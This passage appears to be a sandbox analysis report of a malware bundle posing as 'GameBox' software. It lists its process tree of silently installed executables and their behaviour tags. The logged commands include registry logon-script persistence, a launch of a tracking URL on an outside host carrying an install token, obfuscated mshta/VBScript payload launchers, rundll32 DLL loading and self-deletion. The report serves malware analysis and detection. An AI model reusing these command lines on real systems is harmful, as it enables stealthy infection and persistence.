                                                "C:\Users\Admin\AppData\Local\Temp\is-77IFM.tmp\Inlog.tmp" /SL5="$1036C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                2⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious use of FindShellTrayWindow
                                                PID:5164
                                                • C:\Users\Admin\AppData\Local\Temp\is-63TFM.tmp\Setup.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\is-63TFM.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                  3⤵
                                                    PID:4652
                                                    • C:\Users\Admin\AppData\Local\Temp\is-VFRS8.tmp\Setup.tmp
                                                      "C:\Users\Admin\AppData\Local\Temp\is-VFRS8.tmp\Setup.tmp" /SL5="$4011C,17367080,721408,C:\Users\Admin\AppData\Local\Temp\is-63TFM.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                      4⤵
                                                      • Loads dropped DLL
                                                      • Drops file in Program Files directory
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:3292
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-EPT68.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                        5⤵
                                                          PID:3132
                                                          • C:\Windows\SysWOW64\expand.exe
                                                            expand C:\Users\Admin\AppData\Local\Temp\is-EPT68.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                            6⤵
                                                            • Drops file in Windows directory
                                                            PID:6312
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                          5⤵
                                                            PID:6856
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                              6⤵
                                                                PID:8400
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                              5⤵
                                                              • Checks computer location settings
                                                              PID:1912
                                                            • C:\Users\Admin\AppData\Local\Temp\is-EPT68.tmp\{app}\vdi_compiler.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\is-EPT68.tmp\{app}\vdi_compiler"
                                                              5⤵
                                                                PID:8928
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-EPT68.tmp\{app}\vdi_compiler.exe"
                                                                  6⤵
                                                                    PID:7444
                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                      ping localhost -n 4
                                                                      7⤵
                                                                      • Runs ping.exe
                                                                      PID:8456
                                                                • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                  "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                  5⤵
                                                                    PID:8444
                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Enumerates connected drives
                                                            • Modifies system certificate store
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:4268
                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629298797 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                              2⤵
                                                              • Enumerates connected drives
                                                              PID:8080
                                                          • C:\Users\Admin\AppData\Local\Temp\is-4TVV8.tmp\WEATHER Manager.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-4TVV8.tmp\WEATHER Manager.tmp" /SL5="$10370,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:5244
                                                            • C:\Users\Admin\AppData\Local\Temp\is-9KUGM.tmp\Setup.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\is-9KUGM.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                              2⤵
                                                              • Loads dropped DLL
                                                              • Enumerates connected drives
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:4636
                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-9KUGM.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-9KUGM.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629298797 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                3⤵
                                                                  PID:4916
                                                            • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                              "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                              1⤵
                                                              • Executes dropped EXE
                                                              PID:5520
                                                            • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                              "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                              1⤵
                                                              • Executes dropped EXE
                                                              PID:5432
                                                              • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:5868
                                                            • C:\Users\Admin\AppData\Local\Temp\is-9F58G.tmp\VPN.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-9F58G.tmp\VPN.tmp" /SL5="$203A2,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:5384
                                                              • C:\Users\Admin\AppData\Local\Temp\is-JKM3H.tmp\Setup.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-JKM3H.tmp\Setup.exe" /silent /subid=720
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:5372
                                                                • C:\Users\Admin\AppData\Local\Temp\is-G9S6C.tmp\Setup.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-G9S6C.tmp\Setup.tmp" /SL5="$7011A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-JKM3H.tmp\Setup.exe" /silent /subid=720
                                                                  3⤵
                                                                  • Loads dropped DLL
                                                                  • Drops file in Program Files directory
                                                                  • Modifies system certificate store
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:5976
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                    4⤵
                                                                      PID:7064
                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                        tapinstall.exe remove tap0901
                                                                        5⤵
                                                                        • Checks SCSI registry key(s)
                                                                        PID:6976
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                      4⤵
                                                                        PID:7800
                                                                        • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                          tapinstall.exe install OemVista.inf tap0901
                                                                          5⤵
                                                                          • Drops file in System32 directory
                                                                          • Drops file in Windows directory
                                                                          • Checks SCSI registry key(s)
                                                                          PID:7616
                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                        4⤵
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        PID:8768
                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                        4⤵
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        PID:9104
                                                                • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  PID:5368
                                                                  • C:\Users\Admin\AppData\Roaming\2172560.exe
                                                                    "C:\Users\Admin\AppData\Roaming\2172560.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:3020
                                                                  • C:\Users\Admin\AppData\Roaming\5880421.exe
                                                                    "C:\Users\Admin\AppData\Roaming\5880421.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious behavior: SetClipboardViewer
                                                                    PID:4960
                                                                  • C:\Users\Admin\AppData\Roaming\6299131.exe
                                                                    "C:\Users\Admin\AppData\Roaming\6299131.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:4164
                                                                  • C:\Users\Admin\AppData\Roaming\6717841.exe
                                                                    "C:\Users\Admin\AppData\Roaming\6717841.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:4048
                                                                • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  PID:5296
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-SM95N.tmp\MediaBurner2.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-SM95N.tmp\MediaBurner2.tmp" /SL5="$1043C,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    PID:5732
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-7028P.tmp\3377047_logo_media.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-7028P.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                      3⤵
                                                                      • Drops file in Drivers directory
                                                                      • Executes dropped EXE
                                                                      • Adds Run key to start application
                                                                      • Drops file in Program Files directory
                                                                      PID:1236
                                                                      • C:\Program Files\Internet Explorer\RFBOVSCIWG\ultramediaburner.exe
                                                                        "C:\Program Files\Internet Explorer\RFBOVSCIWG\ultramediaburner.exe" /VERYSILENT
                                                                        4⤵
                                                                          PID:7684
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-CIU62.tmp\ultramediaburner.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-CIU62.tmp\ultramediaburner.tmp" /SL5="$4033A,281924,62464,C:\Program Files\Internet Explorer\RFBOVSCIWG\ultramediaburner.exe" /VERYSILENT
                                                                            5⤵
                                                                            • Drops file in Program Files directory
                                                                            PID:7784
                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                              6⤵
                                                                                PID:7980
                                                                          • C:\Users\Admin\AppData\Local\Temp\6b-304cb-fed-cedb2-656858ffd2a5a\Kecapaeshazhy.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\6b-304cb-fed-cedb2-656858ffd2a5a\Kecapaeshazhy.exe"
                                                                            4⤵
                                                                            • Checks computer location settings
                                                                            PID:7768
                                                                          • C:\Users\Admin\AppData\Local\Temp\c6-dcfb2-64f-460ae-6b55636674a4e\Cuqasharewae.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\c6-dcfb2-64f-460ae-6b55636674a4e\Cuqasharewae.exe"
                                                                            4⤵
                                                                              PID:7848
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mnhahpcf.1vg\GcleanerEU.exe /eufive & exit
                                                                                5⤵
                                                                                  PID:5200
                                                                                  • C:\Users\Admin\AppData\Local\Temp\mnhahpcf.1vg\GcleanerEU.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\mnhahpcf.1vg\GcleanerEU.exe /eufive
                                                                                    6⤵
                                                                                      PID:7748
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\moynwuw0.ts2\installer.exe /qn CAMPAIGN="654" & exit
                                                                                    5⤵
                                                                                      PID:5284
                                                                                      • C:\Users\Admin\AppData\Local\Temp\moynwuw0.ts2\installer.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\moynwuw0.ts2\installer.exe /qn CAMPAIGN="654"
                                                                                        6⤵
                                                                                          PID:5800
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wy43vtso.04i\ufgaa.exe & exit
                                                                                        5⤵
                                                                                          PID:7336
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xfwkx1qo.ire\anyname.exe & exit
                                                                                          5⤵
                                                                                            PID:7032
                                                                                            • C:\Users\Admin\AppData\Local\Temp\xfwkx1qo.ire\anyname.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\xfwkx1qo.ire\anyname.exe
                                                                                              6⤵
                                                                                                PID:6164
                                                                                                • C:\Users\Admin\AppData\Local\Temp\xfwkx1qo.ire\anyname.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\xfwkx1qo.ire\anyname.exe" -q
                                                                                                  7⤵
                                                                                                    PID:6400
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      8⤵
                                                                                                        PID:5284
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qcts51cm.fau\gcleaner.exe /mixfive & exit
                                                                                                  5⤵
                                                                                                    PID:6060
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\qcts51cm.fau\gcleaner.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\qcts51cm.fau\gcleaner.exe /mixfive
                                                                                                      6⤵
                                                                                                        PID:7900
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l5d3lf1n.bxl\autosubplayer.exe /S & exit
                                                                                                      5⤵
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:4136
                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks computer location settings
                                                                                              PID:5612
                                                                                              • C:\Users\Admin\Documents\fBWYCjQbjMzTUfX_DzYUaFbi.exe
                                                                                                "C:\Users\Admin\Documents\fBWYCjQbjMzTUfX_DzYUaFbi.exe"
                                                                                                2⤵
                                                                                                • Drops file in Program Files directory
                                                                                                PID:6336
                                                                                              • C:\Users\Admin\Documents\6_nfFTZsUvFMrGmucxGfeh7I.exe
                                                                                                "C:\Users\Admin\Documents\6_nfFTZsUvFMrGmucxGfeh7I.exe"
                                                                                                2⤵
                                                                                                • Checks BIOS information in registry
                                                                                                • Checks whether UAC is enabled
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                PID:6348
                                                                                              • C:\Users\Admin\Documents\bjhXdacIoGvKKQnQN3QqZPbX.exe
                                                                                                "C:\Users\Admin\Documents\bjhXdacIoGvKKQnQN3QqZPbX.exe"
                                                                                                2⤵
                                                                                                • Loads dropped DLL
                                                                                                PID:6384
                                                                                              • C:\Users\Admin\Documents\8N179Xj7GY5g3UjoeWQ7S0dk.exe
                                                                                                "C:\Users\Admin\Documents\8N179Xj7GY5g3UjoeWQ7S0dk.exe"
                                                                                                2⤵
                                                                                                  PID:6416
                                                                                                • C:\Users\Admin\Documents\88dFZXIj5SWEMm2rw12q_6hj.exe
                                                                                                  "C:\Users\Admin\Documents\88dFZXIj5SWEMm2rw12q_6hj.exe"
                                                                                                  2⤵
                                                                                                    PID:6460
                                                                                                  • C:\Users\Admin\Documents\q8_26L70hLjjXEtWTWXbClCg.exe
                                                                                                    "C:\Users\Admin\Documents\q8_26L70hLjjXEtWTWXbClCg.exe"
                                                                                                    2⤵
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    PID:6476
                                                                                                  • C:\Users\Admin\Documents\MnSTwMDh_cAOrpVVtHgkdoow.exe
                                                                                                    "C:\Users\Admin\Documents\MnSTwMDh_cAOrpVVtHgkdoow.exe"
                                                                                                    2⤵
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:6544
                                                                                                    • C:\Users\Admin\Documents\MnSTwMDh_cAOrpVVtHgkdoow.exe
                                                                                                      C:\Users\Admin\Documents\MnSTwMDh_cAOrpVVtHgkdoow.exe
                                                                                                      3⤵
                                                                                                        PID:5852
                                                                                                    • C:\Users\Admin\Documents\ObEIFlyYSN3wIx2Uu_WdTwah.exe
                                                                                                      "C:\Users\Admin\Documents\ObEIFlyYSN3wIx2Uu_WdTwah.exe"
                                                                                                      2⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:6584
                                                                                                      • C:\Users\Admin\Documents\ObEIFlyYSN3wIx2Uu_WdTwah.exe
                                                                                                        C:\Users\Admin\Documents\ObEIFlyYSN3wIx2Uu_WdTwah.exe
                                                                                                        3⤵
                                                                                                          PID:5844
                                                                                                      • C:\Users\Admin\Documents\3Q44mrRQdDQ22aPAn8vA_JQ4.exe
                                                                                                        "C:\Users\Admin\Documents\3Q44mrRQdDQ22aPAn8vA_JQ4.exe"
                                                                                                        2⤵
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:6408
                                                                                                      • C:\Users\Admin\Documents\kl9cBeYtTAw85rCh5YA8dyKP.exe
                                                                                                        "C:\Users\Admin\Documents\kl9cBeYtTAw85rCh5YA8dyKP.exe"
                                                                                                        2⤵
                                                                                                          PID:6356
                                                                                                          • C:\Users\Admin\Documents\kl9cBeYtTAw85rCh5YA8dyKP.exe
                                                                                                            "C:\Users\Admin\Documents\kl9cBeYtTAw85rCh5YA8dyKP.exe"
                                                                                                            3⤵
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:6272
                                                                                                        • C:\Users\Admin\Documents\stt1dchKzziqqewFIFB08aqu.exe
                                                                                                          "C:\Users\Admin\Documents\stt1dchKzziqqewFIFB08aqu.exe"
                                                                                                          2⤵
                                                                                                            PID:6304
                                                                                                          • C:\Users\Admin\Documents\nDiOgGcNvHLx4u6_STS2pxXe.exe
                                                                                                            "C:\Users\Admin\Documents\nDiOgGcNvHLx4u6_STS2pxXe.exe"
                                                                                                            2⤵
                                                                                                              PID:6632
                                                                                                              • C:\Users\Admin\AppData\Roaming\7386449.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\7386449.exe"
                                                                                                                3⤵
                                                                                                                  PID:5400
                                                                                                                • C:\Users\Admin\AppData\Roaming\5659403.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\5659403.exe"
                                                                                                                  3⤵
                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                  PID:1832
                                                                                                                • C:\Users\Admin\AppData\Roaming\4629999.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\4629999.exe"
                                                                                                                  3⤵
                                                                                                                    PID:7284
                                                                                                                • C:\Users\Admin\Documents\yfACKZ27QNrF7RXdZPx2sqrf.exe
                                                                                                                  "C:\Users\Admin\Documents\yfACKZ27QNrF7RXdZPx2sqrf.exe"
                                                                                                                  2⤵
                                                                                                                    PID:6624
                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                      "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\yfACKZ27QNrF7RXdZPx2sqrf.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\yfACKZ27QNrF7RXdZPx2sqrf.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                      3⤵
                                                                                                                        PID:6876
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\yfACKZ27QNrF7RXdZPx2sqrf.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\yfACKZ27QNrF7RXdZPx2sqrf.exe" ) do taskkill -f -iM "%~NxA"
                                                                                                                          4⤵
                                                                                                                            PID:6212
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                                                                                                              hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                                                                                                              5⤵
                                                                                                                                PID:4400
                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                  "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                  6⤵
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:6896
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                                                                                                    7⤵
                                                                                                                                      PID:5104
                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                                                                                                    6⤵
                                                                                                                                      PID:8108
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    taskkill -f -iM "yfACKZ27QNrF7RXdZPx2sqrf.exe"
                                                                                                                                    5⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:6884
                                                                                                                            • C:\Users\Admin\Documents\KWzVpVoBXZsebbk_XaYwku8n.exe
                                                                                                                              "C:\Users\Admin\Documents\KWzVpVoBXZsebbk_XaYwku8n.exe"
                                                                                                                              2⤵
                                                                                                                                PID:6896
                                                                                                                                • C:\Users\Admin\Documents\KWzVpVoBXZsebbk_XaYwku8n.exe
                                                                                                                                  C:\Users\Admin\Documents\KWzVpVoBXZsebbk_XaYwku8n.exe
                                                                                                                                  3⤵
                                                                                                                                    PID:6256
                                                                                                                                • C:\Users\Admin\Documents\59xKm00fmnFrcOm3qxvlkFGS.exe
                                                                                                                                  "C:\Users\Admin\Documents\59xKm00fmnFrcOm3qxvlkFGS.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                  PID:6888
                                                                                                                                • C:\Users\Admin\Documents\hw3zRPVYEC_nUbMrOCRJLrsm.exe
                                                                                                                                  "C:\Users\Admin\Documents\hw3zRPVYEC_nUbMrOCRJLrsm.exe"
                                                                                                                                  2⤵
                                                                                                                                    PID:6824
                                                                                                                                  • C:\Users\Admin\Documents\YzYC5sC8Ygv1bmTuUcJX6se8.exe
                                                                                                                                    "C:\Users\Admin\Documents\YzYC5sC8Ygv1bmTuUcJX6se8.exe"
                                                                                                                                    2⤵
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:6816
                                                                                                                                    • C:\Users\Admin\Documents\YzYC5sC8Ygv1bmTuUcJX6se8.exe
                                                                                                                                      "C:\Users\Admin\Documents\YzYC5sC8Ygv1bmTuUcJX6se8.exe"
                                                                                                                                      3⤵
                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                      PID:4928
                                                                                                                                  • C:\Users\Admin\Documents\y_xghaJc_sYmriB4A5ACmseB.exe
                                                                                                                                    "C:\Users\Admin\Documents\y_xghaJc_sYmriB4A5ACmseB.exe"
                                                                                                                                    2⤵
                                                                                                                                      PID:6808
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 484
                                                                                                                                        3⤵
                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                        • Program crash
                                                                                                                                        PID:4308
                                                                                                                                    • C:\Users\Admin\Documents\jOvuOeu4aCm94eeNJepDlxhI.exe
                                                                                                                                      "C:\Users\Admin\Documents\jOvuOeu4aCm94eeNJepDlxhI.exe"
                                                                                                                                      2⤵
                                                                                                                                        PID:7108
                                                                                                                                        • C:\Users\Admin\Documents\jOvuOeu4aCm94eeNJepDlxhI.exe
                                                                                                                                          "C:\Users\Admin\Documents\jOvuOeu4aCm94eeNJepDlxhI.exe" -q
                                                                                                                                          3⤵
                                                                                                                                            PID:4480
                                                                                                                                        • C:\Users\Admin\Documents\WLbby1J25CwsLiYROu1BH4n6.exe
                                                                                                                                          "C:\Users\Admin\Documents\WLbby1J25CwsLiYROu1BH4n6.exe"
                                                                                                                                          2⤵
                                                                                                                                            PID:6164
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-3CKEB.tmp\WLbby1J25CwsLiYROu1BH4n6.tmp
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-3CKEB.tmp\WLbby1J25CwsLiYROu1BH4n6.tmp" /SL5="$20478,138429,56832,C:\Users\Admin\Documents\WLbby1J25CwsLiYROu1BH4n6.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                              PID:6608
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-0F7MC.tmp\Setup.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-0F7MC.tmp\Setup.exe" /Verysilent
                                                                                                                                                4⤵
                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                PID:1788
                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                  5⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                  PID:7436
                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629298797 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:8852
                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
